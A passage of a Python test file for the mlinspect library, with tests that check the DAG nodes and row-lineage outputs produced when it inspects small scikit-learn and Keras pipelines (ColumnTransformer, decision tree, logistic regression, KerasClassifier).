expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_column_transformer_one_transformer():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
one transformer
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': [1, 2, 10, 5]})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A', 'B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1.], [-0.71428571], [1.57142857], [0.14285714]])
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, columns=['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 59),
"pd.DataFrame({'A': [1, 2, 10, 5], 'B': [1, 2, 10, 5]})"))
expected_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 21, 10, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A', 'B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection, expected_standard_scaler)
expected_concat = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 10, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A', 'B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, 1, {LineageId(0, 0)}],
[2, 2, {LineageId(0, 1)}],
[10, 10, {LineageId(0, 2)}]],
columns=['A', 'B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0, -1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, -0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, -1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, -0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_column_transformer_multiple_transformers_all_dense():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
multiple transformers with dense output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A']),
('categorical', OneHotEncoder(sparse=False), ['B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1., 1., 0., 0.], [-0.71428571, 0., 1., 0.], [ 1.57142857, 1., 0., 0.],
[0.14285714, 0., 0., 1.]])
print(encoded_data)
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 82),
"pd.DataFrame({'A': [1, 2, 10, 5], "
"'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_projection_1 = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A']", ['A']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_1)
expected_projection_2 = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['B']", ['B']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_2)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection_1, expected_standard_scaler)
expected_one_hot = DagNode(4,
BasicCodeLocation("<string-source>", 10),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(10, 20, 10, 47), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_projection_2, expected_one_hot)
expected_concat = DagNode(5,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
expected_dag.add_edge(expected_one_hot, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_1]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, {LineageId(0, 0)}],
[2, {LineageId(0, 1)}],
[10, {LineageId(0, 2)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_2]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([['cat_a', {LineageId(0, 0)}],
['cat_b', {LineageId(0, 1)}],
['cat_a', {LineageId(0, 2)}]],
columns=['B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
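    # Where the scaled values come from (editorial note): StandardScaler uses the
    # population standard deviation, so for A = [1, 2, 10, 5] the mean is 4.5 and
    # std = sqrt(((-3.5)**2 + (-2.5)**2 + 5.5**2 + 0.5**2) / 4) = 3.5, giving
    # (1 - 4.5) / 3.5 = -1.0 and (2 - 4.5) / 3.5 = -0.7142857... below.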
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_one_hot]
lineage_output = inspection_results_data_source[RowLineage(3)]
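    # Editorial note: OneHotEncoder orders its output columns by sorted category,
    # i.e. ['cat_a', 'cat_b', 'cat_c'], so 'cat_a' encodes to [1, 0, 0] and so on.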
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, 1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, 0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
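# Editorial note on the mixed sparse/dense case below: ColumnTransformer picks the
# stacked output format via its sparse_threshold parameter (default 0.3); here the
# estimated density (0.5, well above 0.3) makes the result dense, which is why the
# pipeline code can call numpy.allclose on encoded_data directly.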
def test_column_transformer_multiple_transformers_sparse_dense():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
    multiple transformers with sparse and dense mixed output
    """
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A']),
('categorical', OneHotEncoder(sparse=True), ['B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1., 1., 0., 0.], [-0.71428571, 0., 1., 0.], [ 1.57142857, 1., 0., 0.],
[0.14285714, 0., 0., 1.]])
print(encoded_data)
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 82),
"pd.DataFrame({'A': [1, 2, 10, 5], "
"'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_projection_1 = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A']", ['A']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_1)
expected_projection_2 = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['B']", ['B']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_2)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection_1, expected_standard_scaler)
expected_one_hot = DagNode(4,
BasicCodeLocation("<string-source>", 10),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(10, 20, 10, 46), 'OneHotEncoder(sparse=True)'))
expected_dag.add_edge(expected_projection_2, expected_one_hot)
expected_concat = DagNode(5,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
expected_dag.add_edge(expected_one_hot, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_1]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, {LineageId(0, 0)}],
[2, {LineageId(0, 1)}],
[10, {LineageId(0, 2)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_2]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([['cat_a', {LineageId(0, 0)}],
['cat_b', {LineageId(0, 1)}],
['cat_a', {LineageId(0, 2)}]],
columns=['B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_one_hot]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, 1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, 0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_decision_tree():
"""
Tests whether the monkey patching of ('sklearn.tree._classes', 'DecisionTreeClassifier') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.tree import DecisionTreeClassifier
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = label_binarize(df['target'], classes=['no', 'yes'])
clf = DecisionTreeClassifier()
clf = clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
expected = np.array([0., 1.])
assert np.allclose(test_predict, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(6, 5, 6, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(8, 8, 8, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 39, 8, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(9, 24, 9, 36), "df['target']"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(9, 9, 9, 60),
"label_binarize(df['target'], classes=['no', 'yes'])"))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_decision_tree = DagNode(7,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Decision Tree', []),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_train_data, expected_decision_tree)
expected_dag.add_edge(expected_train_labels, expected_decision_tree)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
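    # Editorial note: for A = B = [0, 1, 2, 3], StandardScaler computes mean 1.5
    # and population std sqrt(1.25) ~= 1.1180, so (0 - 1.5) / sqrt(1.25) =
    # -1.3416407864998738, matching the first expected row below.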
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
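    # Editorial note: with exactly two classes, label_binarize returns a single
    # 0/1 column ('no' -> 0, 'yes' -> 1), hence the one-element arrays below.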
expected_lineage_df = DataFrame([[numpy.array([0]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([1]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_decision_tree]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
def test_logistic_regression():
"""
Tests whether the monkey patching of ('sklearn.linear_model._logistic', 'LogisticRegression') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.linear_model import LogisticRegression
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = label_binarize(df['target'], classes=['no', 'yes'])
clf = LogisticRegression()
clf = clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
expected = np.array([0., 1.])
assert np.allclose(test_predict, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(6, 5, 6, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(8, 8, 8, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 39, 8, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(9, 24, 9, 36), "df['target']"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(9, 9, 9, 60),
"label_binarize(df['target'], classes=['no', 'yes'])"))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('sklearn.linear_model._logistic', 'LogisticRegression')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('sklearn.linear_model._logistic',
'LogisticRegression')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_estimator = DagNode(7,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('sklearn.linear_model._logistic',
'LogisticRegression')),
DagNodeDetails('Logistic Regression', []),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_train_data, expected_estimator)
expected_dag.add_edge(expected_train_labels, expected_estimator)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([0]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([1]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_estimator]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
def test_keras_wrapper():
"""
Tests whether the monkey patching of ('tensorflow.python.keras.wrappers.scikit_learn', 'KerasClassifier') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from tensorflow.keras.wrappers.scikit_learn import KerasClassifier
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential
from tensorflow.python.keras.optimizer_v2.gradient_descent import SGD
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = OneHotEncoder(sparse=False).fit_transform(df[['target']])
def create_model(input_dim):
clf = Sequential()
clf.add(Dense(9, activation='relu', input_dim=input_dim))
clf.add(Dense(9, activation='relu'))
clf.add(Dense(2, activation='softmax'))
clf.compile(loss='categorical_crossentropy', optimizer=SGD(), metrics=["accuracy"])
return clf
clf = KerasClassifier(build_fn=create_model, epochs=2, batch_size=1, verbose=0, input_dim=2)
clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
assert test_predict.shape == (2,)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
